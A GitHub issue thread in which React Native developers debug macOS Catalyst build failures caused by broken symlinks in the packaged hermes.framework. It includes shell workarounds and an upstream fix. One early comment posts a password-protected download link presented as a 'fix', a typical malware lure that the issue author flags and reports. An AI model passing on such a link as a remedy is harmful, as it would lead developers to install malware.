### ISSUE TITLE
[v0.75.2] macOS (Catalyst) builds fail with `hermes.framework: bundle format is ambiguous (could be app or framework)`

### ISSUE THREAD

**Issue by birdofpreyru** [facebook/react-native#46213]
### Description

Migrating my libraries / app from RN@0.74 to the latest RN@0.75.2. When building for macOS (Catalyst) target my build fails with that error `hermes.framework: bundle format is ambiguous (could be app or framework)`. I first posted the issue to the Hermes repo (https://github.com/facebook/hermes/issues/1492), but I was told there, it must be an issue on RN side, how it packages stuff.

### Steps to reproduce

N/A

### React Native Version

0.75.2

### Affected Platforms

Build - MacOS

### Output of `npx react-native info`

```text
N/A
```

### Stacktrace or Logs

```text
N/A
```

### Reproducer

N/A

**Comment by sunshinezxq** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by birdofpreyru** [comment]
@sunshinezxq that looks likes an attempt to trick users into downloading a malware, I got it reported to GitHub :)

**Comment by cipolleschi** [comment]
Thanks for reporting the user.

QQ: How do I repro it?
I create a new app and try to archive for macCatalyst?

**Comment by birdofpreyru** [comment]
> _QQ: How do I repro it?_
> _I create a new app and try to archive for macCatalyst?_

Yes, I just verified, a clean app created with `@react-native-community/cli`, macCatalyst build fails exactly this same way for me.

**Comment by zahidhussain998** [comment]
Yeah same thing is happening here

**Comment by cipolleschi** [comment]
I just created a new app with 0.75.2 and I can't reproduce the issue for catalyst (See the screenshot).

We had a [similar report](https://github.com/reactwg/react-native-releases/issues/390) back then, but I couldn't repro either.

Can you try run `pod deintegrate` and try again. I'm afraid that cocoapods cached a wrong version of hermes in your system and tries to use that one to run macCatalyst for some reason.

<img width="2301" alt="Screenshot 2024-08-29 at 11 26 25" src="https://github.com/user-attachments/assets/910a6e15-6027-43d0-9f53-49aa4fd6c128">

**Comment by birdofpreyru** [comment]
@cipolleschi 

`pod deintegrate` did not help.

I tried to remove all caches I may think of &mdash; all installed / generated files in the clean app template, entire `~/Library/Caches/CocoaPods`, and `~/Library/Developer/Xcode/DerivedData` folders &mdash; it did not help either.

Have you tested it with the new architecture build? May it be caused by me still having an old Intel-based mac mini, rather than latest Apple Silicon one?

**Comment by cipolleschi** [comment]
I tried both New Arch and Old Arch and it works. Although it should not make a difference for Hermes which is architecture agnostic.

The intel-based mac mini could be an option, I have not thought about the possibility, honestly. 🤔 
Also, I'm not sure how I could test that hypothesis... What is strange is that we didn't really changed anything in the Hermes build logic that could make that fail. And the catalyst architecture we build for CatalystMacOS is arm64_x86_64, so it should support both silicon (arm64) and intel (x86_64)...

<img width="1170" alt="Screenshot 2024-08-29 at 15 30 35" src="https://github.com/user-attachments/assets/290ecac0-96b1-444c-aeb6-86ec417fdd08">

**Comment by birdofpreyru** [comment]
@cipolleschi Here is the detailed error I get:
<img width="872" alt="image" src="https://github.com/user-attachments/assets/b8f638a8-cd9e-49df-a189-3418d06bd1dd">
and here is the archived content of that `hermes.framework` folder within the bundled app:
[hermes.framework.zip](https://github.com/user-attachments/files/16801293/hermes.framework.zip)
if you see anything unexpected about these?

Anything else I can check?

**Comment by cipolleschi** [comment]
Interestingly it might be a symlink issue: https://stackoverflow.com/questions/25969946/osx-10-9-5-code-signing-v2-signing-a-framework-with-bundle-format-is-ambiguou

**Comment by cipolleschi** [comment]
the Catalyst slice of a xcframework has a structure that is similar to the one used by a desktop app.
<img width="659" alt="Screenshot 2024-08-29 at 16 22 03" src="https://github.com/user-attachments/assets/0a4eb6b5-3bcc-4b7d-8721-358d9a347fd6">
The various `hermes` files with the empty doc icon are symlink to executable. I think your system does not interpret them properly and see them just as files with a link inside... 🤔 

I need to spend more time looking at how we move stuff around to see if, perhaps we can solve this at build time.

**Comment by birdofpreyru** [comment]
well, the [Anatomy of Framework Bundle](https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPFrameworks/Concepts/FrameworkAnatomy.html), referenced in the StackOverflow thread you referred to, says that _Resources_ folder on top level of a proper framework bundle should be a symlink, and _Versions_ should be the only real directory... that's now what I end up with - in my case _Resources_ is just a regular folder with _Info.plist_ file inside it. Not sure, if/how I can manually force it to be a symlink, to double-check it is the problem, though.

**Comment by cipolleschi** [comment]
in my case it is a folder as well, but it is working fine. could you confirm that the folder structure is the same?

<img width="561" alt="Screenshot 2024-08-29 at 17 36 30" src="https://github.com/user-attachments/assets/349da71b-20e8-4025-8dee-c94a17d0cc8b">

**Comment by birdofpreyru** [comment]
The only difference I see is that `hermes` file in the root has 7MB size in my bundle. The ones under `Versions/X` have 13.6MB, the same as on your screenshot.

**Comment by cipolleschi** [comment]
> The only difference I see is that hermes file in the root has 7MB size in my bundle

That's weird. They should all have the same size.

When you run `pod install`, do you have this line?
<img width="920" alt="Screenshot 2024-08-30 at 10 50 15" src="https://github.com/user-attachments/assets/d80e0cd1-fa7b-462d-9a14-6648d287a495">

Also, are you building for Debug or Release?

**Comment by birdofpreyru** [comment]
I looked more into my logs, I believe it copies the correct 13.6 MB into the app bundle, I guess it shrinks it down to ~7MB when it does this:
<img width="1284" alt="image" src="https://github.com/user-attachments/assets/7dcbad12-502d-41e2-9c41-0328b6cb1e34">

**Comment by birdofpreyru** [comment]
I guess, that stripping step does not take place if you target new Apple Silicon hardware? Btw, although the build fails, it turns out the app bundle it creates before the failure, runs seemingly fine 0.o

**Comment by cipolleschi** [comment]
> I guess, that stripping step does not take place if you target new Apple Silicon hardware? Btw, although the build fails, it turns out the app bundle it creates before the failure, runs seemingly fine 0.o

Wut! if that's the case, it feels like an Xcode issue more than a RN one. Do you have any chance to test on a Silicon machine?

**Comment by birdofpreyru** [comment]
> _Do you have any chance to test on a Silicon machine?_

Not yet; but I guess if I am starting to run into such problems, it is a high time to get myself a new Apple machine, which I'll probably do :)

**Comment by robertying** [comment]
The same error happens on my Apple Silicon mac as well, both for debug and archive.

**Comment by robertying** [comment]
Something definitely has changed from 0.74 to 0.75. These are the different hermes.tar.gz file structures after unzipping:

`ls -al ~/Downloads/0.74.5/Library/Frameworks/universal/hermes.xcframework/ios-arm64_x86_64-maccatalyst/hermes.framework`:
```
drwxr-xr-x@ 5 rying  staff  160 Aug  5 06:55 .
drwxr-xr-x@ 3 rying  staff   96 Aug  5 06:55 ..
lrwxr-xr-x@ 1 rying  staff   26 Aug  5 06:55 Resources -> Versions/Current/Resources
drwxr-xr-x@ 4 rying  staff  128 Aug  5 06:55 Versions
lrwxr-xr-x@ 1 rying  staff   23 Aug  5 06:55 hermes -> Versions/Current/hermes
```

`ls -al ~/Downloads/0.75.2/Library/Frameworks/universal/hermes.xcframework/ios-arm64_x86_64-maccatalyst/hermes.framework`:
```
drwxr-xr-x@ 5 rying  staff       160 Aug 20 02:49 .
drwxr-xr-x@ 3 rying  staff        96 Aug 20 02:49 ..
drwxr-xr-x@ 3 rying  staff        96 Aug 20 02:49 Resources
drwxr-xr-x@ 4 rying  staff       128 Aug 20 02:49 Versions
-rw-r--r--@ 1 rying  staff  13564883 Aug 20 02:49 hermes
```

**Comment by robertying** [comment]
Ok I think the symlinks are broken in the 0.75 hermes build.

To fix the symlinks, go to your project root and run:

```sh
cd ios/Pods/hermes-engine/destroot/Library/Frameworks/universal/hermes.xcframework/ios-arm64_x86_64-maccatalyst/hermes.framework
rm -r hermes Resources
ln -s Versions/Current/Resources Resources
ln -s Versions/Current/hermes hermes
cd Versions && rm -r Current && ln -s 0 Current
```

@cipolleschi does RN do the packaging for hermes or is this indeed a hermes issue (that we should forward back to the hermes repo)?

**Comment by hsjoberg** [comment]
> does RN do the packaging for hermes or is this indeed a hermes issue (that we should forward back to the hermes repo)?

@robertying I believe OP was referred to the react-native github project by Hermes devs due to them not doing the packaging (https://github.com/facebook/hermes/issues/1492).


FWIW, I'm seeing the same symptoms, but for react-native-macos. I'll try the symlink fixes soon.

**Comment by cipolleschi** [comment]
@robertying Thanks for your investigation. That helps a lot.

React Native is responsible to package and distribute Hermes, so that's actually a React Native issue.

What we changes w.r.t. 0.74 is that we had to move the whole build and release pipeline from CircleCI to GitHub Actions.
The upload artifact action has some issues with symlinks, sadly and it has given us headaches already in `main` as well.

I'll try to double check and do some extra checks today, but with React Universe coming up I'm not sure whether a fix will arrive soon. It might have to wait for a week or so.

Meanwhile, I'll reopen the issue.

**Comment by robertying** [comment]
Thanks @cipolleschi! Thankfully we have a workaround so it's not too urgent I guess.

**Comment by cipolleschi** [comment]
For (my) future references, Nightlies has the same issue. 🤔 

```
➜  Nightly076 git:(main) ✗ ls -al /Users/cipolleschi/Tests/Nightly076/ios/Pods/hermes-engine/destroot/Library/Frameworks/universal/hermes.xcframework/ios-arm64_x86_64-maccatalyst/hermes.framework
total 26512
drwxr-xr-x  5 cipolleschi  staff       160 Aug 27 12:21 .
drwxr-xr-x  3 cipolleschi  staff        96 Aug 27 12:21 ..
drwxr-xr-x  3 cipolleschi  staff        96 Aug 27 12:21 Resources
drwxr-xr-x  4 cipolleschi  staff       128 Aug 27 12:21 Versions
-rw-r--r--  1 cipolleschi  staff  13573923 Aug 27 12:21 hermes
```

**Comment by cipolleschi** [comment]
Looking in the `upload-artifacts` repo, there are quite a few issues related to [symlinks](https://github.com/actions/upload-artifact/issues?q=sort%3Aupdated-desc+is%3Aissue+is%3Aopen+symlinks). It looks like that the default behavior for `upload-artifacts` is to follow symlinks and copy the file/folder the symlink points to. 🤦 

I guess we have to add a custom step to revert those changes before creating the archive.

@hsjoberg that's expected, as the `framework` format for Catalyst and MacOS is the same

**Comment by cipolleschi** [comment]
https://github.com/facebook/react-native/pull/46301 this seems to fix the issue. It is not done yet, I only verified that there are symlinks in the generated artifacts.

**Comment by cipolleschi** [comment]
Hello there! I think I fixed the issue in the above PR.
Can some of you (@birdofpreyru @hsjoberg) please try it? :pray:

You can download the hermes tarball from [this link](https://github.com/facebook/react-native/actions/runs/10671527175/artifacts/1883248106)

And then you can install pods using this command:
```
HERMES_ENGINE_TARBALL_PATH=<path-to-downloaded-tar> bundle exec pod install
```
and try to build again.

**Comment by cipolleschi** [comment]
nono, you have to download the tarball locally first! 😄

**Comment by hsjoberg** [comment]
> You can download the hermes tarball from [this link](https://github.com/facebook/react-native/actions/runs/10671527175/artifacts/1883248106)
> 
> And then you can install pods using this command:
> 
> ```
> HERMES_ENGINE_TARBALL_PATH=<path-to-downloaded-tar> bundle exec pod install
> ```
> 
> and try to build again.

Thank you for looking into this issue @cipolleschi. 🙏 
Is this the correct tarball though? It doesn't seem to contain the any xcframework, rather it's the actual hermes macOS desktop tools:

```
❯ unzip -vl hermes-osx-bin-Release.zip
Archive:  hermes-osx-bin-Release.zip
 Length   Method    Size  Cmpr    Date    Time   CRC-32   Name
--------  ------  ------- ---- ---------- ----- --------  ----
10424467  Defl:N  2944140  72% 09-02-2024 18:31 ce126323  hermes
     479  Defl:N      311  35% 09-02-2024 18:31 0f360c6f  hermes-lit
 6175108  Defl:N  1700213  73% 09-02-2024 18:31 1e5631b3  hermesc
--------          -------  ---                            -------
16600054          4644664  72%                            3 files
```

Hermes Pod folder becomes empty after running `HERMES_ENGINE_TARBALL_PATH=<path-to-downloaded-tar> bundle exec pod install`:


```
TurboLnd/example/macos on  master [!?] took 15s
❯ HERMES_ENGINE_TARBALL_PATH=/Users/coco/Projects/Blixt/1/TurboLnd/example/macos/hermes-osx-bin-Release.zip bundle exec pod install
[...]
Installing hermes-engine (0.75.2)
[...]
Pod installation complete! There are 66 dependencies from the Podfile and 64 total pods installed.
TurboLnd/example/macos on  master [!?] took 15s
❯ ls Pods/hermes-engine

TurboLnd/example/macos on  master [!?]
❯
```

**Comment by cipolleschi** [comment]
Sorry, my bad. This is the right [link](https://github.com/facebook/react-native/actions/runs/10759676939/artifacts/1905963248)

**Comment by gabrieldonadel** [comment]
> Sorry, my bad. This is the right [link](https://github.com/facebook/react-native/actions/runs/10759676939/artifacts/1905963248)
>  

Even when using this new link I still get  `ReactCommon/hermes/inspector-modern/chrome/Registration.h:15:10: 'hermes/hermes.h' file not found`


<img width="821" alt="image" src="https://github.com/user-attachments/assets/d189cd48-319c-4ef4-9b89-9bfac667307a">

**Comment by hsjoberg** [comment]
@cipolleschi I'm not sure exactly what I should make of this, but it appears to almost work for react-native-macos.
I'm getting some undefined symbols, but perhaps react-native(-macos) 0.76 would be needed for it to work?
![image](https://github.com/user-attachments/assets/e99519c6-e738-4b7e-874f-40969577f3a0)

---

@gabrieldonadel did you unzip the zip-file first in order to get the tarball? Looks like it's failing pretty early.

**Comment by cipolleschi** [comment]
Can you guys try with a nightly? I already applied the same changes to main, so yesterday nightly contains all the proper fixes. If you can safely build catalyst or MacOS using the Nightly, we should be good to go.

@hsjoberg yes, MacOS might have to catch up on the changes my colleagues made for the Debugger. The inspector_modern symbol you see there is the inspector for the new Debugger in the React Native Dev Tools

**Comment by hsjoberg** [comment]
> @hsjoberg yes, MacOS might have to catch up on the changes my colleagues made for the Debugger. The inspector_modern symbol you see there is the inspector for the new Debugger in the React Native Dev Tools

@cipolleschi Gotcha, yes that makes sense.
I think react-native-macos usually pulls in commits after there's a new release line for react-native core.

Pinging @Saadnajmi so that you're aware of this issue.

**Comment by Saadnajmi** [comment]
I don't expect React Native macOS to hit the same issue, since it's technically a different platform. But yes, working on merging up to 0.76 right now..

**Comment by hsjoberg** [comment]
Well, I'm currently seeing the same symptoms as OP on react-native-macos 0.75.

From what I can tell react-native-macos pulls in iOS Hermes, so I thought this was related to OPs issue:
https://github.com/microsoft/react-native-macos/blob/042cd6c36b23c21d20de628bc9756793e01ce282/packages/react-native/sdks/hermes-engine/hermes-utils.rb#L237-L257

**Comment by gabemeola** [comment]
In my case I had to disable the prebuilts to get it working on Mac Catalyst.

```ruby
ENV['RCT_USE_RN_DEP'] = '0'
ENV['RCT_USE_PREBUILT_RNCORE'] = '0'
```

**Comment by robertying** [comment]
This issue seems to have come back when I upgraded to 0.83.1

I had to redo [the same steps I previously commented](https://github.com/facebook/react-native/issues/46213#issuecomment-2322764892) to fix the framework for it to build for Mac Catalyst

```
cd ios/Pods/hermes-engine/destroot/Library/Frameworks/universal/hermesvm.xcframework/ios-arm64_x86_64-maccatalyst/hermesvm.framework
rm -r hermesvm Resources
ln -s Versions/Current/Resources Resources
ln -s Versions/Current/hermesvm hermesvm
cd Versions && rm -r Current && ln -s 0 Current # this is important
```

**Comment by birdofpreyru** [comment]
+1. For me macOS builds broke again after the upgrade from RN@0.82.1 to RN@0.83.0, and neither work with RN@0.83.1, but I had no capacity to report or investigate; thus thanks @robertying for your message 👏

**Comment by robertying** [comment]
The release build for Mac Catalyst (building x86_64 target on an ARM Mac) seems to be broken on 0.83.1 with Hermes 0.14 as well...

>```ld: warning: ignoring file '/Users/rying/Library/Developer/Xcode/DerivedData/learnX-bqofrgctsoxzlefwjjfqtyqdttvd/Build/Intermediates.noindex/ArchiveIntermediates/learnX/BuildProductsPath/Release-maccatalyst/XCFrameworkIntermediates/hermes-engine/Pre-built/hermesvm.framework/hermesvm': found architecture 'arm64', required architecture 'x86_64'```

Turns out the bundled `hermesvm` file doesn't contain x86_64 binary so it was built wrong in the first place:

>```Non-fat file: ~/Downloads/hermes-ios-0.14.0-debug/destroot/Library/Frameworks/universal/hermesvm.xcframework/ios-arm64_x86_64-maccatalyst/hermesvm.framework/hermesvm is architecture: arm64```
